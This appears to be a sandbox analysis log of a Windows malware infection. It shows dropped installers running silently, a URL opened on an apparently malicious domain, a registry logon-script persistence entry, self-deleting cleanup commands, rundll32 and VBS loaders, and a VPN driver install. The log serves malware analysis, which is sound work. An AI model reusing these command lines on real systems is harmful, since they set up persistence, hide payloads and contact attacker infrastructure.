C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe"C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe" /8-236⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe"C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe" /8-237⤵
-
C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-40MML.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-40MML.tmp\IBInstaller_97039.tmp" /SL5="$104AE,14575459,721408,C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=8⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks computer location settings
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 410⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe"C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe" /VERYSILENT /id=5356⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe"C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe" /quiet SILENT=1 AF=7566⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617314532 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe"C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe" ll3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-JTU35.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JTU35.tmp\setups.tmp" /SL5="$501B2,454998,229376,C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe" ll4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"{path}"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im loli.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im loli.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5796 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 57965⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\is-41RMI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-41RMI.tmp\vict.tmp" /SL5="$20366,870426,780800,C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe" /VERYSILENT /id=5351⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-8P6LI.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-8P6LI.tmp\win1host.exe" 5352⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EAuLKqWeY.exe"C:\Users\Admin\AppData\Local\Temp\EAuLKqWeY.exe"3⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 10323⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\microsoft.cab -F:* %ProgramData%1⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\microsoft.cab -F:* C:\ProgramData2⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6091C4E6E138FD8F367E8FA4C15AEB28 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A19662A9BF453AF517C64DF92FA1A2A42⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1c0,0x1ec,0x7ffb57039ec0,0x7ffb57039ed0,0x7ffb57039ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=1700 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2464 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2192 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1816 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3116 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3492 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3164 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3388 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3172 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2480 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2880 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=828 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2472 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{039e4ca7-990b-0f42-82bd-c20401777d16}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\804C.exeC:\Users\Admin\AppData\Local\Temp\804C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8484.exeC:\Users\Admin\AppData\Local\Temp\8484.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\90E8.exeC:\Users\Admin\AppData\Local\Temp\90E8.exe1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\90E8.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\9D0F.exeC:\Users\Admin\AppData\Local\Temp\9D0F.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\E36F.exeC:\Users\Admin\AppData\Local\Temp\E36F.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E36F.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E36F.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\ED54.exeC:\Users\Admin\AppData\Local\Temp\ED54.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5336 -s 8682⤵
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
